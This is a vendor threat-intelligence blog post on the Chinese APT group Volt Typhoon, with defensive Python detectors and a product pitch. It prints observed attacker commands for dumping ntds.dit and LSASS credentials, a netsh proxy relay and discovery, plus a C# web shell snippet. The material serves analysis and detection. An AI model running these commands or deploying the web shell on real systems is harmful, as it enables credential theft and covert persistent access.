Volt Typhoon: The Chinese APT Group Abusing LOLBins for Cyber Espionage

Huseyin Can YUCEEL  By Huseyin Can YUCEEL  •  June 01, 2023

 

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

On May 24, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Volt Typhoon, a state-sponsored Chinese APT group [1]. Volt Typhoon runs cyber espionage campaigns against critical infrastructure organizations in the United States and Asia. To stay undetected in a target's network, the group relies primarily on Living Off The Land Binaries (LOLBins): built-in Windows tools whose use blends in with routine administration instead of custom malware that security controls would flag.

In this blog post, we explain the tools and techniques used by Volt Typhoon and how the group abuses Living Off The Land Binaries (LOLBins) to keep its activity below the detection threshold.


Volt Typhoon: PRC State-Sponsored Cyber Espionage Group

Volt Typhoon (also known as BRONZE SILHOUETTE) is a People's Republic of China (PRC) state-sponsored APT group that focuses on stealthy, targeted cyber espionage campaigns against critical infrastructure organizations. The group has been actively targeting the communications, construction, education, government, information technology, manufacturing, maritime, transportation, and utility sectors since at least mid-2021, nearly two years at the time of writing.

The main objective of Volt Typhoon is to collect and exfiltrate sensitive information while avoiding detection. For this purpose, the group uses living-off-the-land techniques so that its activity looks like routine administration rather than intrusion tooling. A typical Volt Typhoon campaign proceeds from initial access to living-off-the-land reconnaissance, then lateral movement, and finally data exfiltration over C2 channels; at every step the operators apply defense evasion techniques to cover their tracks.

Techniques and LOLBins used by Volt Typhoon

Initial Access

T1078 Valid Accounts & T1190 Exploit Public-Facing Application

Volt Typhoon gains initial access to the target environment with stolen credentials of valid accounts. The group is also known to exploit vulnerabilities in public-facing devices and applications for initial access, including Fortinet FortiGuard devices, CVE-2021-40539 in ManageEngine ADSelfService Plus (a REST API authentication bypass that leads to remote code execution), and CVE-2021-27860 in FatPipe WARP, MPVPN, and IPVPN (an unauthenticated file upload that leads to remote code execution). Patching these internet-facing systems and checking them for web shells after a suspected exploitation attempt are the corresponding defensive actions.

Execution

T1047 Windows Management Instrumentation

Volt Typhoon uses Windows Management Instrumentation, mostly through the wmic command-line utility, for discovery, credential dumping, and command execution. WMI is present on every Windows host and is routinely used by administrators and management software, which is exactly why it is attractive to the group.

//Information gathering from the compromised host (logical disks, file systems, free space)
wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename

//Extracting ntds.dit for credential dumping: "ac i ntds" activates the NTDS instance and "ifm create full" writes an Install-From-Media snapshot (ntds.dit plus the SYSTEM and SECURITY registry hives) to <filepath>, all wrapped in a WMI process creation
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full <filepath>\""

T1059 Command and Scripting Interpreter

Threat actors use PowerShell and the Windows Command Shell to execute commands on compromised hosts. The examples below are cmd.exe one-liners observed in the campaign.

//Creating a volume shadow copy of the system drive (the first step of the ntds.dit extraction described under Credential Access)
cmd /c vssadmin create shadow /for=C: > <filepath>

//Port forwarding with netsh portproxy: every connection to port 9999 on any interface of this host is relayed to port 8443 on an internal host, which turns the compromised machine into an internal proxy (T1090.001) and hides the real destination of the traffic
cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=<internal_ip_address> connectport=8443 protocol=tcp"

//Dumping LSASS memory for credential access (T1003.001). The MiniDump export of comsvcs.dll writes the full memory of the process with PID 552 (lsass.exe on that host) to the named file. -E (EncodedCommand) expects a base64-encoded command, so the rundll32 invocation would have been passed encoded; it is shown decoded here for readability
cmd.exe /c powershell -exec bypass -W hidden -nop -E rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 552 C:\Windows\Temp\vmware-vhost.dmp full
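The netsh portproxy rule above is a persistent artifact: it survives reboots, is stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, and is listed by "netsh interface portproxy show v4tov4". The Python script below is an added example, not code from this page, from the advisory, or from Picus. It parses the output of that netsh command or of a "reg query" of the key (both samples are constructed here, as are the addresses), rates every entry, and emits the matching netsh delete command. An entry that listens on all interfaces and relays to another host, the pattern used by Volt Typhoon, is rated high; netsh prints "*" for a 0.0.0.0 listen address, which the parser normalizes.

```python
# Added example: audit netsh portproxy listeners from captured tool output.
# The sample outputs, hosts and addresses below are constructed, not real captures.
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample of 'netsh interface portproxy show v4tov4' output.
SAMPLE_NETSH = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               9999        10.20.30.40     8443
127.0.0.1       8080        127.0.0.1       80
"""

# Constructed sample of 'reg query HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'.
# Each rule is a REG_SZ value named '<listen>/<port>' with data '<connect>/<port>'.
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
    0.0.0.0/9999    REG_SZ    10.20.30.40/8443
"""


@dataclass(frozen=True)
class PortProxyEntry:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int


NETSH_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")
REG_ROW = re.compile(r"^(\S+)/(\d+)\s+REG_SZ\s+(\S+)/(\d+)$")


def _entry(listen, lport, connect, cport):
    listen = "0.0.0.0" if listen == "*" else listen   # netsh shows '*' for 0.0.0.0
    return PortProxyEntry(listen, int(lport), connect, int(cport))


def parse_netsh(output):
    """Rows of the 'show v4tov4' table; header, separator and blank lines never match."""
    return [_entry(*m.groups()) for line in output.splitlines()
            if (m := NETSH_ROW.match(line.strip()))]


def parse_reg(output):
    """Values under the v4tov4\\tcp key, same shape as the netsh rows."""
    return [_entry(*m.groups()) for line in output.splitlines()
            if (m := REG_ROW.match(line.strip()))]


def _addr(text):
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None   # netsh also accepts hostnames here


def assess(entry):
    """Return (severity, reasons). Any portproxy rule on a host that is not a router
    deserves a look; one that listens everywhere and relays elsewhere is the Volt Typhoon pattern."""
    listen, connect = _addr(entry.listen_addr), _addr(entry.connect_addr)
    reasons = []
    if listen is not None and listen.is_unspecified:
        reasons.append("listens on all interfaces")
    if connect is None or (connect != listen and not connect.is_loopback):
        reasons.append(f"relays to another host {entry.connect_addr}:{entry.connect_port}")
    severity = "high" if len(reasons) == 2 else "medium" if reasons else "low"
    return severity, reasons


def audit(entries):
    """One finding per entry, with the netsh command that removes the rule."""
    findings = []
    for e in entries:
        severity, reasons = assess(e)
        findings.append({
            "entry": e, "severity": severity, "reasons": reasons,
            "remove_with": (f"netsh interface portproxy delete v4tov4 "
                            f"listenaddress={e.listen_addr} listenport={e.listen_port}"),
        })
    return findings


if __name__ == "__main__":
    for f in audit(parse_netsh(SAMPLE_NETSH) + parse_reg(SAMPLE_REG)):
        print(f["severity"], f["entry"], f["reasons"], "->", f["remove_with"])
```

Run it against the real output on a suspect host, or against a registry export from a forensic image; the registry parser exists precisely because the rule is visible there even when you cannot run netsh on the live system.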

Persistence

T1505.003 Server Software Component: Web Shell

Volt Typhoon deploys web shells as backdoors to maintain persistent access to compromised networks. The web shell appears to be a derivative of the Awen web shell, extended with AES encryption (or base64 encoding) of the command output it returns to the operator, so the response does not contain readable command results.

//Snippet from the C#-based Awen-derivative web shell (using directives and a syntax fix added so the method compiles; Decrypt is the web shell's own AES routine and is not shown)

using System;
using System.Diagnostics;
using System.IO;
using System.Text;

string ExcuteCmd(string arg)
{
    // "cmd.exe" is assembled from a char array so the literal string does not appear in the file
    char[] array = { 'c', 'm', 'd', '.', 'e', 'x', 'e' };
    string cmd = new string(array);
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = cmd;
    psi.Arguments = "/c " + arg;           // run the operator-supplied command through cmd.exe
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    psi.RedirectStandardError = true;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string CmdOut = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
    string encmdout = Decrypt(CmdOut);      // AES step applied to the output (named Decrypt in the sample)
    byte[] enbase64 = Encoding.Default.GetBytes(encmdout);
    string enstr = Convert.ToBase64String(enbase64);   // base64-encode for the HTTP response
    stmrdr.Close();
    return enstr;
}

Defense Evasion

T1564 Hide Artifacts & T1070 Indicator Removal

Volt Typhoon selectively removes Windows Event Logs, system logs, and other artifacts of its activity to hide its presence and limit threat-hunting. Because the deletion happens on the compromised host, the practical countermeasure is to forward event logs to a central collector as they are written, so that clearing a log on the endpoint does not erase the record.

Credential Access

T1003 OS Credential Dumping

As a cyber espionage group, Volt Typhoon gathers credentials of valid accounts in the victim network. These credentials let the operators move and execute commands across the network without raising alerts. For credential dumping, they extract the ntds.dit file and the SYSTEM registry hive from Windows domain controllers, either through an ntdsutil IFM snapshot or from a volume shadow copy. ntds.dit holds the password hashes of every domain account and the SYSTEM hive holds the boot key needed to decrypt them, so the pair is enough to harvest the credentials of valid accounts offline. On workstations and member servers the group dumps LSASS memory instead, as shown in the comsvcs.dll MiniDump command under Execution.

//creating a volume shadow copy of the system drive
cmd /c vssadmin create shadow /for=C: > <filepath>

//copying ntds.dit out of the shadow copy (the live file is held open by lsass.exe and cannot be copied directly)
cmd /c copy <VSS_path>\Windows\NTDS\ntds.dit C:\Windows\Temp > <filepath>
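Every command in the Execution and Credential Access sections is a legitimate administrative tool, so detection has to key on the arguments rather than the binary. The Python script below is an added example, not code from this page, from the advisory, or from Picus. It runs a small set of command-line rules for the ntdsutil IFM snapshot, the shadow copy, the ntds.dit copy, and the comsvcs.dll MiniDump over constructed process-creation events shaped like Sysmon Event ID 1 / Security 4688 fields, then groups the hits per host so that a domain controller on which several of these steps fire is reported as a credential-dumping chain. Host names, user names, timestamps, and the event shape are assumptions.

```python
# Added example: command-line rules for the credential-dumping LOLBin use described
# above, run over constructed process-creation events. Not code from the page or the advisory.
import re
from collections import defaultdict

# (rule name, ATT&CK technique, severity, regex applied to the normalised command line)
RULES = [
    ("ntds_ifm_snapshot",      "T1003.003", "high",   r"ntdsutil.*\bifm\b.*create\s+full"),
    ("shadow_copy_create",     "T1003.003", "medium", r"\bvssadmin(\.exe)?\s+create\s+shadow\b"),
    ("ntds_copy_from_shadow",  "T1003.003", "high",   r"\bcopy\b.*\\ntds\\ntds\.dit\b"),
    ("lsass_comsvcs_minidump", "T1003.001", "high",   r"comsvcs(\.dll)?\s*,?\s*minidump\b"),
    ("wmic_process_create",    "T1047",     "low",    r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b"),
]
COMPILED = [(n, t, s, re.compile(p, re.IGNORECASE)) for n, t, s, p in RULES]

# Constructed events; hosts, users and timestamps are assumptions.
EVENTS = [
    {"ts": "2023-05-24T10:01:02", "host": "DC01", "user": r"CORP\svc_backup", "image": "wmic.exe",
     "cmdline": r'wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\pro\""'},
    {"ts": "2023-05-24T10:03:10", "host": "DC01", "user": r"CORP\svc_backup", "image": "cmd.exe",
     "cmdline": r"cmd /c vssadmin create shadow /for=C: > C:\Windows\Temp\vss.txt"},
    {"ts": "2023-05-24T10:03:41", "host": "DC01", "user": r"CORP\svc_backup", "image": "cmd.exe",
     "cmdline": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp > C:\Windows\Temp\out.txt"},
    {"ts": "2023-05-24T10:20:00", "host": "WS07", "user": r"CORP\jdoe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 552 C:\Windows\Temp\vmware-vhost.dmp full"},
    # Benign look-alikes: WMI discovery and listing shadow copies should not fire.
    {"ts": "2023-05-24T10:21:00", "host": "WS07", "user": r"CORP\jdoe", "image": "wmic.exe",
     "cmdline": r"wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"},
    {"ts": "2023-05-24T11:00:00", "host": "DC01", "user": r"CORP\admin", "image": "vssadmin.exe",
     "cmdline": r"vssadmin list shadows"},
]


def normalise(cmdline):
    """Collapse whitespace so spacing tricks do not break the patterns."""
    return re.sub(r"\s+", " ", cmdline).strip()


def match_rules(cmdline):
    """All (rule, technique, severity) triples whose pattern matches the command line."""
    norm = normalise(cmdline)
    return [(n, t, s) for n, t, s, rx in COMPILED if rx.search(norm)]


def scan(events):
    """One finding per (event, matching rule)."""
    findings = []
    for ev in events:
        for name, technique, severity in match_rules(ev["cmdline"]):
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": name, "technique": technique, "severity": severity,
                             "cmdline": ev["cmdline"]})
    return findings


def dumping_chains(findings, min_steps=2):
    """Hosts on which at least min_steps distinct T1003 rules fired: a shadow copy
    followed by a copy of ntds.dit is far more telling than either step alone."""
    steps = defaultdict(set)
    for f in findings:
        if f["technique"].startswith("T1003"):
            steps[f["host"]].add(f["rule"])
    return {host: sorted(rules) for host, rules in steps.items() if len(rules) >= min_steps}


if __name__ == "__main__":
    hits = scan(EVENTS)
    for h in hits:
        print(h["severity"], h["host"], h["rule"], h["technique"])
    print("chains:", dumping_chains(hits))
```

The wmic rule is deliberately low severity on its own; its value is as corroborating context when it wraps one of the high-severity patterns, as in the first event.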

Discovery

Volt Typhoon enumerates compromised networks to discover users, hosts, and services. The gathered information is leveraged in the lateral movement and data exfiltration phases of the campaign. The observed commands below are grouped by the ATT&CK technique they map to; all of them are built-in Windows tools, run mostly through cmd.exe.

//T1033 System Owner/User Discovery
whoami

//T1069 Permission Groups Discovery
net localgroup administrators
net group /dom
net group "Domain Admins" /dom

//T1016 System Network Configuration Discovery (netsh variants listed as observed, including ones with legacy or invalid syntax)
arp -a
ipconfig /all
netsh interface firewall show all
netsh interface portproxy show all
netsh interface portproxy show v4tov4
netsh firewall show all
netsh portproxy show v4tov4

//T1049 System Network Connections Discovery
netstat -ano

//T1018 Remote System Discovery (enumerating every record of a DNS zone)
dnscmd . /enumrecords /zone {REDACTED}

//T1012 Query Registry
reg query hklm\software\

//T1082 System Information Discovery
systeminfo
wmic volume list brief
wmic baseboard list full

//T1057 Process Discovery
tasklist /v

//T1007 System Service Discovery
wmic service brief

//T1518 Software Discovery
wmic product list brief
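Taken one at a time, every command in this list is something an administrator types, so a single-command alert on whoami or ipconfig would be noise. What distinguishes Volt Typhoon's hands-on-keyboard reconnaissance is the burst: many distinct discovery techniques from one user on one host within minutes. The Python script below is an added example, not code from this page or from the advisory. It classifies constructed process-creation events into the discovery techniques listed above and raises one alert per user and host when at least four distinct techniques occur inside a ten-minute window. The events, host names, user names, and both thresholds are assumptions to tune to your environment.

```python
# Added example: burst detection over the discovery commands listed above.
# Not code from the page or the advisory; events and thresholds are constructed assumptions.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Leading "cmd /c" or "cmd.exe /c" wrappers and an opening quote are stripped before classifying.
WRAPPER = re.compile(r'^(?:cmd(?:\.exe)?\s+/c\s+)?"?', re.IGNORECASE)

# Ordered (regex, technique) pairs; the first match wins.
DISCOVERY = [
    (r"^whoami\b",                                                              "T1033"),
    (r"^net\s+(?:localgroup|group)\b",                                          "T1069"),
    (r"^(?:arp|ipconfig|netsh)\b",                                              "T1016"),
    (r"^netstat\b",                                                             "T1049"),
    (r"^dnscmd\b",                                                              "T1018"),
    (r"^reg\s+query\b",                                                         "T1012"),
    (r"^tasklist\b",                                                            "T1057"),
    (r"^wmic\s+service\b",                                                      "T1007"),
    (r"^wmic\s+product\b",                                                      "T1518"),
    (r"^(?:systeminfo|wmic\s+(?:baseboard|volume|path\s+win32_logicaldisk))\b", "T1082"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), t) for p, t in DISCOVERY]

# Constructed events: one operator running the page's command list, one admin running two checks.
EVENTS = [
    {"ts": "2023-05-24T10:00:05", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "whoami"},
    {"ts": "2023-05-24T10:00:40", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "net localgroup administrators"},
    {"ts": "2023-05-24T10:01:02", "host": "WS07", "user": r"CORP\jdoe", "cmdline": 'net group "Domain Admins" /dom'},
    {"ts": "2023-05-24T10:01:30", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "cmd /c ipconfig /all"},
    {"ts": "2023-05-24T10:02:11", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "netstat -ano"},
    {"ts": "2023-05-24T10:02:50", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "systeminfo"},
    {"ts": "2023-05-24T10:03:30", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "tasklist /v"},
    {"ts": "2023-05-24T10:04:15", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "wmic product list brief"},
    {"ts": "2023-05-24T10:05:00", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "reg query hklm\\software\\"},
    {"ts": "2023-05-24T10:05:30", "host": "WS07", "user": r"CORP\jdoe", "cmdline": "notepad.exe notes.txt"},
    {"ts": "2023-05-24T09:00:00", "host": "DC01", "user": r"CORP\admin", "cmdline": "ipconfig /all"},
    {"ts": "2023-05-24T09:40:00", "host": "DC01", "user": r"CORP\admin", "cmdline": "systeminfo"},
]


def classify(cmdline):
    """Return the ATT&CK discovery technique for a command line, or None if it is not discovery."""
    body = WRAPPER.sub("", cmdline.strip(), count=1)
    for rx, technique in COMPILED:
        if rx.search(body):
            return technique
    return None


def detect_bursts(events, window=timedelta(minutes=10), min_techniques=4):
    """One alert per (host, user) whose discovery commands cover at least
    min_techniques distinct techniques inside some span no longer than window."""
    per_actor = defaultdict(list)
    for ev in events:
        technique = classify(ev["cmdline"])
        if technique:
            per_actor[(ev["host"], ev["user"])].append(
                (datetime.fromisoformat(ev["ts"]), technique, ev["cmdline"]))
    alerts = []
    for (host, user), items in per_actor.items():
        items.sort()
        for i, (start, _, _) in enumerate(items):      # slide the window over each start point
            in_window = [it for it in items[i:] if it[0] - start <= window]
            techniques = sorted({it[1] for it in in_window})
            if len(techniques) >= min_techniques:
                alerts.append({"host": host, "user": user,
                               "window_start": start.isoformat(),
                               "window_end": in_window[-1][0].isoformat(),
                               "techniques": techniques,
                               "commands": [it[2] for it in in_window]})
                break                                  # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for a in detect_bursts(EVENTS):
        print(a["host"], a["user"], a["window_start"], a["window_end"], a["techniques"])
```

Counting distinct techniques rather than raw commands is what keeps a script that runs ipconfig ten times from tripping the rule; the administrator in the sample stays below the threshold both by count and by spacing.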

Command and Control

T1090 Proxy

Volt Typhoon routes the traffic between the victim network and its C2 servers through compromised small office/home office (SOHO) network devices. Connections therefore originate from residential and small-business IP space rather than from known-bad infrastructure, which blends them into normal internet noise and complicates IP-based blocking and attribution.

How Picus Helps Simulate Volt Typhoon Attacks

We also strongly suggest simulating Volt Typhoon attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as Lazarus, Turla, APT33, and Sandworm, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the Volt Typhoon group:

Threat ID | Threat Name | Attack Module
55804 | Volt Typhoon Threat Group Campaign 2023 | Endpoint
69320 | Volt Typhoon Threat Group Campaign Malware Download Threat | Network Infiltration
44146 | Volt Typhoon Threat Group Campaign Malware Email Threat | Email Infiltration (Phishing)

Picus Threat Library also includes threats for vulnerabilities exploited by Volt Typhoon:

Threat ID | Threat Name | Exploited Vulnerability | Attack Module
62195 | Zoho ManageEngine Web Attack Campaign | CVE-2021-40539 | Web Application
31317 | FortiProxy Web Attack Campaign | CVE-2022-42475 | Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures for the malware and vulnerabilities used by the Volt Typhoon APT group in preventive security controls. Picus Labs has validated the following signatures for Volt Typhoon and its toolset:

Security Control | Signature ID | Signature Name
Check Point NGFW | 0959C2951 | Generic.Win32.Volt Typhoon.TC.d91bxcpv
Check Point NGFW | 0862738FC | Backdoor.Win32.Volt Typhoon.TC.09d6atYg
Check Point NGFW | 097ECF5F3 | Backdoor.Win32.Volt Typhoon.TC.eb4esBVo
Check Point NGFW | 0D7987079 | Backdoor.Win32.Volt Typhoon.TC.8e4fOBpT
Check Point NGFW | 0FA988343 | Backdoor.Win32.Volt Typhoon.TC.66f0xuMC
Check Point NGFW | 0EF7FD024 | Backdoor.Win32.Volt Typhoon.TC.6499KMVP
Cisco Firepower | 1.300594.1 | MALWARE-TOOLS Win.Proxy.frp download attempt
Cisco Firepower | 1.58201.2 | SERVER-WEBAPP Zoho ManageEngine ADSelfService Plus RestAPI authentication bypass attempt
Forcepoint NGFW | (no ID listed) | File_Malware-Blocked
Forcepoint NGFW | (no ID listed) | HTTP_CRL-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
Forcepoint NGFW | (no ID listed) | HTTP_CSU-Zoho-Manageengine-Adselfservice-Plus-Authentication-Bypass
FortiGate AV | 4050557 | Riskware/HackTool
FortiGate IPS | 50773 | ManageEngine.ADSelfService.Plus.RestAPI.Authentication.Bypass
FortiWeb | 90501371 | Known Exploits
Imperva SecureSphere | (no ID listed) | CVE-2021-40539: ManageEngine ADSelfService Plus REST API URLs Remote Authentication Bypass - Endpoint 1
Palo Alto | 91676 | ZOHOcorp ManageEngine Improper Authentication Vulnerability
Palo Alto | 585502944 | tool/Win32.kryptik.bavrw
Palo Alto | 585824982 | Trojan/Win64.wingoobfus.b
Palo Alto | 585825012 | Trojan/Win64.wingoobfus.c
Snort | 1.61914.1 | MALWARE-TOOLS Win.Proxy.frp download attempt
Snort | 1.58201.2 | SERVER-WEBAPP Zoho ManageEngine ADSelfService Plus RestAPI authentication bypass attempt
TippingPoint | 42855 | HTTP: Fortinet FortiOS Heap Buffer Overflow Vulnerability
Trellix | 0x4840c900 | MALWARE: Malicious File Detected by GTI
Trellix | 0x4529eb00 | HTTP: Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Complete Security Validation Platform.

References

[1] Cybersecurity and Infrastructure Security Agency (CISA), "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection," Cybersecurity Advisory AA23-144A, May 24, 2023. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

 